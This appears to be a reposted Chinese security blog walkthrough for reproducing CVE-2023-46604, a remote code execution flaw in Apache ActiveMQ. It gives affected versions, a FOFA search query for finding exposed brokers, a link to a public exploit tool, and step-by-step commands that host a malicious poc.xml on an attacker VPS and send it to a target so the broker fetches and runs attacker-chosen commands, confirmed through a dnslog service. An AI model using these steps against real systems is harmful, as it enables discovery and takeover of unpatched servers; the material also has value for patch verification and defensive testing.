一、Apache ActiveMQ简介
Apache ActiveMQ是一个开源的、功能强大的消息代理(Message Broker),由 Apache Software Foundation 所提供。ActiveMQ 支持 Java Message Service(JMS)1.1 和 2.0规范,提供了一个高性能、简单、灵活和支持多种语言(Java, C, C++, Ruby, Python, Perl等)的消息队列系统。
二、漏洞影响版本
Apache ActiveMQ < 5.18.3
Apache ActiveMQ < 5.17.6
Apache ActiveMQ < 5.16.7
Apache ActiveMQ < 5.15.16
三、FOFA语法
app="APACHE-ActiveMQ" && port="61616"
四、漏洞复现
1.漏洞工具下载
https://github.com/sule01u/CVE-2023-46604
2.进入目录
cd CVE-2023-46604
3.将poc.xml部署到http服务(Deploy on your vps)
python3 -m http.server
4.发送poc
python3 CVE-2023-46604.py -i target_ip -p target_port --xml http://vps_ip:8000/poc.xml
你可以通过修改poc.xml中的rce命令来做不同的验证
5.利用漏洞进行成功dnslog回显,确认漏洞真实存在,dnslog平台地址
http://www.dnslog.cn
原文始发于微信公众号(网络安全学习爱好者):Apache ActiveMQ RCE漏洞(CVE-2023-46604)复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论